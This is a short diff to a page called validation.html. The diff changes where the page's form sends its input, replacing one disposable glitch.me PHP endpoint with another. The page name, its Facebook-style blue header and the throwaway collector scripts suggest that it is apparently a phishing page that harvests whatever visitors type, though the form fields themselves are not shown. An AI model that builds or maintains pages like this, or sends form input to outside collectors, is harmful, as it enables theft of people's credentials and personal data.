--- a/validation.html
+++ b/validation.html
@@ -8,7 +8,7 @@
 </head>
 
 <body>
-  <form class="content" action="https://alluring-hammerhead-copper.glitch.me/Ayob.php" method="POST">
+  <form class="content" action="https://coffee-sun-gymnast.glitch.me/Bilawal.php" method="POST">
             <div>
                 
                     <div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);">
